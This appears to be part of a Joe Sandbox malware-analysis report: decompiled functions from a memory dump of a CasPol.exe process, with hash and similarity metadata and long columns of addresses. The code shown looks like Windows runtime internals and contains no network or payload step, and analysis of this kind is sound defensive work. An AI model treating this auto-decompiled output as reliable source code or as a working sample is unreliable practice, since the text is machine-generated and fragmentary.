                                                                                                                                                                                                                                                                                                0x017bbaf0
                                                                                                                                                                                                                                                                                                0x017bbaf0
                                                                                                                                                                                                                                                                                                0x017bbaec
                                                                                                                                                                                                                                                                                                0x017bbafb
                                                                                                                                                                                                                                                                                                0x017bbafc
                                                                                                                                                                                                                                                                                                0x017bbafe
                                                                                                                                                                                                                                                                                                0x017bbb01
                                                                                                                                                                                                                                                                                                0x017bbb01
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x017bbb06
                                                                                                                                                                                                                                                                                                0x017bb9d7
                                                                                                                                                                                                                                                                                                0x017bb9db
                                                                                                                                                                                                                                                                                                0x017bb9db
                                                                                                                                                                                                                                                                                                0x017bb9de
                                                                                                                                                                                                                                                                                                0x017bb9de
                                                                                                                                                                                                                                                                                                0x017bb9e4
                                                                                                                                                                                                                                                                                                0x017bb9e7
                                                                                                                                                                                                                                                                                                0x017bb9ea
                                                                                                                                                                                                                                                                                                0x017bb9ec
                                                                                                                                                                                                                                                                                                0x017bb9ef
                                                                                                                                                                                                                                                                                                0x017bb9f3
                                                                                                                                                                                                                                                                                                0x017bba1b
                                                                                                                                                                                                                                                                                                0x017bba1b
                                                                                                                                                                                                                                                                                                0x017bba23
                                                                                                                                                                                                                                                                                                0x017bba24
                                                                                                                                                                                                                                                                                                0x017bba27
                                                                                                                                                                                                                                                                                                0x017bba2a
                                                                                                                                                                                                                                                                                                0x017bba2b
                                                                                                                                                                                                                                                                                                0x017bba2e
                                                                                                                                                                                                                                                                                                0x017bba30
                                                                                                                                                                                                                                                                                                0x017bba37
                                                                                                                                                                                                                                                                                                0x017bba3f
                                                                                                                                                                                                                                                                                                0x017bba9c
                                                                                                                                                                                                                                                                                                0x017bbaa2
                                                                                                                                                                                                                                                                                                0x017bbb13
                                                                                                                                                                                                                                                                                                0x017bbb15
                                                                                                                                                                                                                                                                                                0x017bbaae
                                                                                                                                                                                                                                                                                                0x017bbaae
                                                                                                                                                                                                                                                                                                0x017bbab3
                                                                                                                                                                                                                                                                                                0x017bbab5
                                                                                                                                                                                                                                                                                                0x017bbaba
                                                                                                                                                                                                                                                                                                0x017bbac8
                                                                                                                                                                                                                                                                                                0x017bbac8
                                                                                                                                                                                                                                                                                                0x017bbaba
                                                                                                                                                                                                                                                                                                0x017bbacd
                                                                                                                                                                                                                                                                                                0x017bbacf
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x017bbacf
                                                                                                                                                                                                                                                                                                0x017bbb1a
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x017bbb1c
                                                                                                                                                                                                                                                                                                0x017bbaa7
                                                                                                                                                                                                                                                                                                0x017bbb11
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x017bbb11
                                                                                                                                                                                                                                                                                                0x017bbaa9
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x017bba41
                                                                                                                                                                                                                                                                                                0x017bba41
                                                                                                                                                                                                                                                                                                0x017bba41
                                                                                                                                                                                                                                                                                                0x017bba58
                                                                                                                                                                                                                                                                                                0x017bba5d
                                                                                                                                                                                                                                                                                                0x017bba62
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x017bba64
                                                                                                                                                                                                                                                                                                0x017bba67
                                                                                                                                                                                                                                                                                                0x017bba68
                                                                                                                                                                                                                                                                                                0x017bba69
                                                                                                                                                                                                                                                                                                0x017bba6c
                                                                                                                                                                                                                                                                                                0x017bba6f
                                                                                                                                                                                                                                                                                                0x017bba71
                                                                                                                                                                                                                                                                                                0x017bba78
                                                                                                                                                                                                                                                                                                0x017bba80
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x017bba90
                                                                                                                                                                                                                                                                                                0x017bba90
                                                                                                                                                                                                                                                                                                0x017bba97
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x017bba97
                                                                                                                                                                                                                                                                                                0x017bb9f5
                                                                                                                                                                                                                                                                                                0x017bb9f7
                                                                                                                                                                                                                                                                                                0x017bb9f7
                                                                                                                                                                                                                                                                                                0x017bb9fa
                                                                                                                                                                                                                                                                                                0x017bba03
                                                                                                                                                                                                                                                                                                0x017bba07
                                                                                                                                                                                                                                                                                                0x017bba0c
                                                                                                                                                                                                                                                                                                0x017bba10
                                                                                                                                                                                                                                                                                                0x017bba17
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x017bb9f7
                                                                                                                                                                                                                                                                                                0x017bb9a6
                                                                                                                                                                                                                                                                                                0x017bb9a8
                                                                                                                                                                                                                                                                                                0x017bb9af
                                                                                                                                                                                                                                                                                                0x017bb9b3
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x017bb9b9
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x017bb9b9
                                                                                                                                                                                                                                                                                                0x017bb94d
                                                                                                                                                                                                                                                                                                0x017bb98f
                                                                                                                                                                                                                                                                                                0x017bb995
                                                                                                                                                                                                                                                                                                0x017bb999
                                                                                                                                                                                                                                                                                                0x017bb960
                                                                                                                                                                                                                                                                                                0x017bb967
                                                                                                                                                                                                                                                                                                0x017bb968
                                                                                                                                                                                                                                                                                                0x017bb96a
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x017bb96a
                                                                                                                                                                                                                                                                                                0x017bb99b
                                                                                                                                                                                                                                                                                                0x017bb99e
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x017bb99e
                                                                                                                                                                                                                                                                                                0x017bb951
                                                                                                                                                                                                                                                                                                0x017bb954
                                                                                                                                                                                                                                                                                                0x017bb95a
                                                                                                                                                                                                                                                                                                0x017bb95e
                                                                                                                                                                                                                                                                                                0x017bb972
                                                                                                                                                                                                                                                                                                0x017bb979
                                                                                                                                                                                                                                                                                                0x017bb97d
                                                                                                                                                                                                                                                                                                0x017bb97f
                                                                                                                                                                                                                                                                                                0x017bb980
                                                                                                                                                                                                                                                                                                0x017bb982
                                                                                                                                                                                                                                                                                                0x017bb984
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x017bb984
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x017bb926
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x017bb926

                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_1700000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 91270d091ecde4adc862b933ef8b4ebd9f5db57991aec037feac4602b868ecff
                                                                                                                                                                                                                                                                                                • Instruction ID: 2b9b8f43aaf3c31fb3bb948d16c2d283af88d7f0af41d39d8bffb3f13ae13c4d
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 91270d091ecde4adc862b933ef8b4ebd9f5db57991aec037feac4602b868ecff
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6771E232640702EFE732DF28CC89F96FBE5EB44720F144928EA55876A1DB75EA44CB50
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 017252A5 Relevance: .2, Instructions: 161COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                C-Code - Quality: 78%
                                                                                                                                                                                                                                                                                                			E017252A5(char __ecx) {
				char _v20;
				char _v28;
				char _v29;
				void* _v32;
				void* _v36;
				void* _v37;
				void* _v38;
				void* _v40;
				void* _v46;
				void* _v64;
				void* __ebx;
				intOrPtr* _t49;
				signed int _t53;
				short _t85;
				signed int _t87;
				signed int _t88;
				signed int _t89;
				intOrPtr _t101;
				intOrPtr* _t102;
				intOrPtr* _t104;
				signed int _t106;
				void* _t108;

				_t93 = __ecx;
				_t108 = (_t106 & 0xfffffff8) - 0x1c;
				_push(_t88);
				_v29 = __ecx;
				_t89 = _t88 | 0xffffffff;
				while(1) {
					L0173EEF0(0x18179a0);
					_t104 =  *0x1818210; // 0x1162e68
					if(_t104 == 0) {
						break;
					}
					asm("lock inc dword [esi]");
					 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)(_t104 + 8));
					E0173EB70(_t93, 0x18179a0);
					if( *((char*)(_t108 + 0xf)) != 0) {
						_t101 =  *0x7ffe02dc;
						__eflags =  *(_t104 + 0x14) & 0x00000001;
						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0x90028);
							_push(_t108 + 0x20);
							_push(0);
							_push(0);
							_push(0);
							_push( *((intOrPtr*)(_t104 + 4)));
							_t53 = E01769890();
							__eflags = _t53;
							if(_t53 >= 0) {
								__eflags =  *(_t104 + 0x14) & 0x00000001;
								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
									L0173EEF0(0x18179a0);
									 *((intOrPtr*)(_t104 + 8)) = _t101;
									E0173EB70(0, 0x18179a0);
								}
								goto L3;
							}
							__eflags = _t53 - 0xc0000012;
							if(__eflags == 0) {
								L12:
								_t13 = _t104 + 0xc; // 0x1162e75
								_t93 = _t13;
								 *((char*)(_t108 + 0x12)) = 0;
								__eflags = E0175F0BF(_t13,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								if(__eflags >= 0) {
									L15:
									_t102 = _v28;
									 *_t102 = 2;
									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
									L0173EEF0(0x18179a0);
									__eflags =  *0x1818210 - _t104; // 0x1162e68
									if(__eflags == 0) {
										__eflags =  *((char*)(_t108 + 0xe));
										_t95 =  *((intOrPtr*)(_t108 + 0x14));
										 *0x1818210 = _t102;
										_t32 = _t102 + 0xc; // 0x0
										 *_t95 =  *_t32;
										_t33 = _t102 + 0x10; // 0x0
										 *((intOrPtr*)(_t95 + 4)) =  *_t33;
										_t35 = _t102 + 4; // 0xffffffff
										 *((intOrPtr*)(_t95 + 8)) =  *_t35;
										if(__eflags != 0) {
											_t95 =  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10))));
											E017A4888(_t89,  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10)))), __eflags);
										}
										E0173EB70(_t95, 0x18179a0);
										asm("lock xadd [esi], eax");
										if(__eflags == 0) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E017695D0();
											L017477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										asm("lock xadd [esi], ebx");
										__eflags = _t89 == 1;
										if(_t89 == 1) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E017695D0();
											L017477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										_t49 = _t102;
										L4:
										return _t49;
									}
									E0173EB70(_t93, 0x18179a0);
									asm("lock xadd [esi], eax");
									if(__eflags == 0) {
										_push( *((intOrPtr*)(_t104 + 4)));
										E017695D0();
										L017477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
										_t102 =  *((intOrPtr*)(_t108 + 0x10));
									}
									 *_t102 = 1;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										_t28 = _t102 + 4; // 0xffffffff
										_push( *_t28);
										E017695D0();
										L017477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
									}
									continue;
								}
								_t93 =  &_v20;
								 *((intOrPtr*)(_t108 + 0x20)) =  *((intOrPtr*)(_t104 + 0x10));
								_t85 = 6;
								_v20 = _t85;
								_t87 = E0175F0BF( &_v20,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								__eflags = _t87;
								if(_t87 < 0) {
									goto L3;
								}
								 *((char*)(_t108 + 0xe)) = 1;
								goto L15;
							}
							__eflags = _t53 - 0xc000026e;
							if(__eflags != 0) {
								goto L3;
							}
							goto L12;
						}
						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
							goto L3;
						} else {
							goto L9;
						}
					}
					L3:
					_t49 = _t104;
					goto L4;
				}
				_t49 = 0;
				goto L4;
			}

























                                                                                                                                                                                                                                                                                                0x017252a5
                                                                                                                                                                                                                                                                                                0x017252ad
                                                                                                                                                                                                                                                                                                0x017252b0
                                                                                                                                                                                                                                                                                                0x017252b3
                                                                                                                                                                                                                                                                                                0x017252b7
                                                                                                                                                                                                                                                                                                0x017252ba
                                                                                                                                                                                                                                                                                                0x017252bf
                                                                                                                                                                                                                                                                                                0x017252c4
                                                                                                                                                                                                                                                                                                0x017252cc
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x017252ce
                                                                                                                                                                                                                                                                                                0x017252d9
                                                                                                                                                                                                                                                                                                0x017252dd
                                                                                                                                                                                                                                                                                                0x017252e7
                                                                                                                                                                                                                                                                                                0x017252f7
                                                                                                                                                                                                                                                                                                0x017252f9
                                                                                                                                                                                                                                                                                                0x017252fd
                                                                                                                                                                                                                                                                                                0x01780dcf
                                                                                                                                                                                                                                                                                                0x01780dd5
                                                                                                                                                                                                                                                                                                0x01780dd6
                                                                                                                                                                                                                                                                                                0x01780dd7
                                                                                                                                                                                                                                                                                                0x01780dd8
                                                                                                                                                                                                                                                                                                0x01780dd9
                                                                                                                                                                                                                                                                                                0x01780dde
                                                                                                                                                                                                                                                                                                0x01780ddf
                                                                                                                                                                                                                                                                                                0x01780de0
                                                                                                                                                                                                                                                                                                0x01780de1
                                                                                                                                                                                                                                                                                                0x01780de2
                                                                                                                                                                                                                                                                                                0x01780de5
                                                                                                                                                                                                                                                                                                0x01780dea
                                                                                                                                                                                                                                                                                                0x01780dec
                                                                                                                                                                                                                                                                                                0x01780f60
                                                                                                                                                                                                                                                                                                0x01780f64
                                                                                                                                                                                                                                                                                                0x01780f70
                                                                                                                                                                                                                                                                                                0x01780f76
                                                                                                                                                                                                                                                                                                0x01780f79
                                                                                                                                                                                                                                                                                                0x01780f79
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x01780f64
                                                                                                                                                                                                                                                                                                0x01780df2
                                                                                                                                                                                                                                                                                                0x01780df7
                                                                                                                                                                                                                                                                                                0x01780e04
                                                                                                                                                                                                                                                                                                0x01780e0d
                                                                                                                                                                                                                                                                                                0x01780e0d
                                                                                                                                                                                                                                                                                                0x01780e10
                                                                                                                                                                                                                                                                                                0x01780e1a
                                                                                                                                                                                                                                                                                                0x01780e1c
                                                                                                                                                                                                                                                                                                0x01780e4c
                                                                                                                                                                                                                                                                                                0x01780e52
                                                                                                                                                                                                                                                                                                0x01780e61
                                                                                                                                                                                                                                                                                                0x01780e67
                                                                                                                                                                                                                                                                                                0x01780e6b
                                                                                                                                                                                                                                                                                                0x01780e70
                                                                                                                                                                                                                                                                                                0x01780e76
                                                                                                                                                                                                                                                                                                0x01780ed7
                                                                                                                                                                                                                                                                                                0x01780edc
                                                                                                                                                                                                                                                                                                0x01780ee0
                                                                                                                                                                                                                                                                                                0x01780ee6
                                                                                                                                                                                                                                                                                                0x01780eea
                                                                                                                                                                                                                                                                                                0x01780eed
                                                                                                                                                                                                                                                                                                0x01780ef0
                                                                                                                                                                                                                                                                                                0x01780ef3
                                                                                                                                                                                                                                                                                                0x01780ef6
                                                                                                                                                                                                                                                                                                0x01780ef9
                                                                                                                                                                                                                                                                                                0x01780efe
                                                                                                                                                                                                                                                                                                0x01780f01
                                                                                                                                                                                                                                                                                                0x01780f01
                                                                                                                                                                                                                                                                                                0x01780f0b
                                                                                                                                                                                                                                                                                                0x01780f12
                                                                                                                                                                                                                                                                                                0x01780f16
                                                                                                                                                                                                                                                                                                0x01780f18
                                                                                                                                                                                                                                                                                                0x01780f1b
                                                                                                                                                                                                                                                                                                0x01780f2c
                                                                                                                                                                                                                                                                                                0x01780f31
                                                                                                                                                                                                                                                                                                0x01780f31
                                                                                                                                                                                                                                                                                                0x01780f35
                                                                                                                                                                                                                                                                                                0x01780f39
                                                                                                                                                                                                                                                                                                0x01780f3a
                                                                                                                                                                                                                                                                                                0x01780f3c
                                                                                                                                                                                                                                                                                                0x01780f3f
                                                                                                                                                                                                                                                                                                0x01780f50
                                                                                                                                                                                                                                                                                                0x01780f55
                                                                                                                                                                                                                                                                                                0x01780f55
                                                                                                                                                                                                                                                                                                0x01780f59
                                                                                                                                                                                                                                                                                                0x017252eb
                                                                                                                                                                                                                                                                                                0x017252f1
                                                                                                                                                                                                                                                                                                0x017252f1
                                                                                                                                                                                                                                                                                                0x01780e7d
                                                                                                                                                                                                                                                                                                0x01780e84
                                                                                                                                                                                                                                                                                                0x01780e88
                                                                                                                                                                                                                                                                                                0x01780e8a
                                                                                                                                                                                                                                                                                                0x01780e8d
                                                                                                                                                                                                                                                                                                0x01780e9e
                                                                                                                                                                                                                                                                                                0x01780ea3
                                                                                                                                                                                                                                                                                                0x01780ea3
                                                                                                                                                                                                                                                                                                0x01780ea7
                                                                                                                                                                                                                                                                                                0x01780eaf
                                                                                                                                                                                                                                                                                                0x01780eb3
                                                                                                                                                                                                                                                                                                0x01780eb9
                                                                                                                                                                                                                                                                                                0x01780eb9
                                                                                                                                                                                                                                                                                                0x01780ebc
                                                                                                                                                                                                                                                                                                0x01780ecd
                                                                                                                                                                                                                                                                                                0x01780ecd
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x01780eb3
                                                                                                                                                                                                                                                                                                0x01780e21
                                                                                                                                                                                                                                                                                                0x01780e2b
                                                                                                                                                                                                                                                                                                0x01780e2f
                                                                                                                                                                                                                                                                                                0x01780e30
                                                                                                                                                                                                                                                                                                0x01780e3a
                                                                                                                                                                                                                                                                                                0x01780e3f
                                                                                                                                                                                                                                                                                                0x01780e41
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x01780e47
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x01780e47
                                                                                                                                                                                                                                                                                                0x01780df9
                                                                                                                                                                                                                                                                                                0x01780dfe
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x01780dfe
                                                                                                                                                                                                                                                                                                0x01725303
                                                                                                                                                                                                                                                                                                0x01725307
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x01725309
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x01725309
                                                                                                                                                                                                                                                                                                0x01725307
                                                                                                                                                                                                                                                                                                0x017252e9
                                                                                                                                                                                                                                                                                                0x017252e9
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x017252e9
                                                                                                                                                                                                                                                                                                0x0172530e
                                                                                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_1700000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: c74e8a3606683d63f5bde8c68e06cf4cea0f025496f2f75b7c1fc76994c1f537
                                                                                                                                                                                                                                                                                                • Instruction ID: 84faab450b12730e90aa66159f33ddfc997265d8a0c816e04d49f09328b35bd2
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c74e8a3606683d63f5bde8c68e06cf4cea0f025496f2f75b7c1fc76994c1f537
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A651CC71245342ABD322EF28C844B67FBE8FF94710F14091EF59587692E774E849CBA2
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                Function 01754D3B Relevance: .1, Instructions: 131COMMON
                                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                                C-Code - Quality: 78%
                                                                                                                                                                                                                                                                                                			E01754D3B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				char _v176;
				char _v177;
				char _v184;
				intOrPtr _v192;
				intOrPtr _v196;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t42;
				char* _t44;
				intOrPtr _t46;
				intOrPtr _t50;
				char* _t57;
				intOrPtr _t59;
				intOrPtr _t67;
				signed int _t69;

				_t64 = __edx;
				_v12 =  *0x181d360 ^ _t69;
				_t65 = 0xa0;
				_v196 = __edx;
				_v177 = 0;
				_t67 = __ecx;
				_v192 = __ecx;
				E0176FA60( &_v176, 0, 0xa0);
				_t57 =  &_v176;
				_t59 = 0xa0;
				if( *0x1817bc8 != 0) {
					L3:
					while(1) {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t67 = _v192;
						 *((intOrPtr*)(_t57 + 0x10)) = _a4;
						 *(_t57 + 0x24) =  *(_t57 + 0x24) & 0x00000000;
						 *(_t57 + 0x14) =  *(_t67 + 0x34) & 0x0000ffff;
						 *((intOrPtr*)(_t57 + 0x20)) = _v196;
						_push( &_v184);
						_push(_t59);
						_push(_t57);
						_push(0xa0);
						_push(_t57);
						_push(0xf);
						_t42 = E0176B0B0();
						if(_t42 != 0xc0000023) {
							break;
						}
						if(_v177 != 0) {
							L017477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
						}
						_v177 = 1;
						_t44 = L01744620(_t59,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v184);
						_t59 = _v184;
						_t57 = _t44;
						if(_t57 != 0) {
							continue;
						} else {
							_t42 = 0xc0000017;
							break;
						}
					}
					if(_t42 != 0) {
						_t65 = L0172CCC0(_t42);
						if(_t65 != 0) {
							L10:
							if(_v177 != 0) {
								if(_t57 != 0) {
									L017477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
								}
							}
							_t46 = _t65;
							L12:
							return L0176B640(_t46, _t57, _v12 ^ _t69, _t64, _t65, _t67);
						}
						L7:
						_t50 = _a4;
						 *((intOrPtr*)(_t67 + 0x30)) =  *((intOrPtr*)(_t57 + 0x18));
						if(_t50 != 3) {
							if(_t50 == 2) {
								goto L8;
							}
							L9:
							if(E0176F380(_t67 + 0xc, 0x1705138, 0x10) == 0) {
								 *0x18160d8 = _t67;
							}
							goto L10;
						}
						L8:
						_t64 = _t57 + 0x28;
						L01754F49(_t67, _t57 + 0x28);
						goto L9;
					}
					_t65 = 0;
					goto L7;
				}
				if(L01754E70(0x18186b0, 0x1755690, 0, 0) != 0) {
					_t46 = L0172CCC0(_t56);
					goto L12;
				} else {
					_t59 = 0xa0;
					goto L3;
				}
			}




















                                                                                                                                                                                                                                                                                                0x01754d3b
                                                                                                                                                                                                                                                                                                0x01754d4d
                                                                                                                                                                                                                                                                                                0x01754d53
                                                                                                                                                                                                                                                                                                0x01754d58
                                                                                                                                                                                                                                                                                                0x01754d65
                                                                                                                                                                                                                                                                                                0x01754d6c
                                                                                                                                                                                                                                                                                                0x01754d71
                                                                                                                                                                                                                                                                                                0x01754d77
                                                                                                                                                                                                                                                                                                0x01754d7f
                                                                                                                                                                                                                                                                                                0x01754d8c
                                                                                                                                                                                                                                                                                                0x01754d8e
                                                                                                                                                                                                                                                                                                0x01754dad
                                                                                                                                                                                                                                                                                                0x01754db0
                                                                                                                                                                                                                                                                                                0x01754db7
                                                                                                                                                                                                                                                                                                0x01754db8
                                                                                                                                                                                                                                                                                                0x01754db9
                                                                                                                                                                                                                                                                                                0x01754dba
                                                                                                                                                                                                                                                                                                0x01754dbb
                                                                                                                                                                                                                                                                                                0x01754dc1
                                                                                                                                                                                                                                                                                                0x01754dc8
                                                                                                                                                                                                                                                                                                0x01754dcc
                                                                                                                                                                                                                                                                                                0x01754dd5
                                                                                                                                                                                                                                                                                                0x01754dde
                                                                                                                                                                                                                                                                                                0x01754ddf
                                                                                                                                                                                                                                                                                                0x01754de0
                                                                                                                                                                                                                                                                                                0x01754de1
                                                                                                                                                                                                                                                                                                0x01754de6
                                                                                                                                                                                                                                                                                                0x01754de7
                                                                                                                                                                                                                                                                                                0x01754de9
                                                                                                                                                                                                                                                                                                0x01754df3
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x01796c7c
                                                                                                                                                                                                                                                                                                0x01796c8a
                                                                                                                                                                                                                                                                                                0x01796c8a
                                                                                                                                                                                                                                                                                                0x01796c9d
                                                                                                                                                                                                                                                                                                0x01796ca7
                                                                                                                                                                                                                                                                                                0x01796cac
                                                                                                                                                                                                                                                                                                0x01796cb2
                                                                                                                                                                                                                                                                                                0x01796cb9
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x01796cbf
                                                                                                                                                                                                                                                                                                0x01796cbf
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x01796cbf
                                                                                                                                                                                                                                                                                                0x01796cb9
                                                                                                                                                                                                                                                                                                0x01754dfb
                                                                                                                                                                                                                                                                                                0x01796ccf
                                                                                                                                                                                                                                                                                                0x01796cd3
                                                                                                                                                                                                                                                                                                0x01754e32
                                                                                                                                                                                                                                                                                                0x01754e39
                                                                                                                                                                                                                                                                                                0x01796ce0
                                                                                                                                                                                                                                                                                                0x01796cf2
                                                                                                                                                                                                                                                                                                0x01796cf2
                                                                                                                                                                                                                                                                                                0x01796ce0
                                                                                                                                                                                                                                                                                                0x01754e3f
                                                                                                                                                                                                                                                                                                0x01754e41
                                                                                                                                                                                                                                                                                                0x01754e51
                                                                                                                                                                                                                                                                                                0x01754e51
                                                                                                                                                                                                                                                                                                0x01754e03
                                                                                                                                                                                                                                                                                                0x01754e03
                                                                                                                                                                                                                                                                                                0x01754e09
                                                                                                                                                                                                                                                                                                0x01754e0f
                                                                                                                                                                                                                                                                                                0x01754e57
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x01754e1b
                                                                                                                                                                                                                                                                                                0x01754e30
                                                                                                                                                                                                                                                                                                0x01754e5b
                                                                                                                                                                                                                                                                                                0x01754e5b
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x01754e30
                                                                                                                                                                                                                                                                                                0x01754e11
                                                                                                                                                                                                                                                                                                0x01754e11
                                                                                                                                                                                                                                                                                                0x01754e16
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x01754e16
                                                                                                                                                                                                                                                                                                0x01754e01
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x01754e01
                                                                                                                                                                                                                                                                                                0x01754da5
                                                                                                                                                                                                                                                                                                0x01796c6b
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x01754dab
                                                                                                                                                                                                                                                                                                0x01754dab
                                                                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                                                                0x01754dab

                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000009.00000002.396884472.0000000001700000.00000040.00001000.00020000.00000000.sdmp, Offset: 01700000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_9_2_1700000_CasPol.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                • Opcode ID: 58f2ba18561799aa3c5038bf714e7e3f7cc65476b5ceb627acabf88fd0abf1f6
                                                                                                                                                                                                                                                                                                • Instruction ID: 3a4313d7b8a285ec71475e7135b7d66a467dd203fdde10a08131452752c98b91
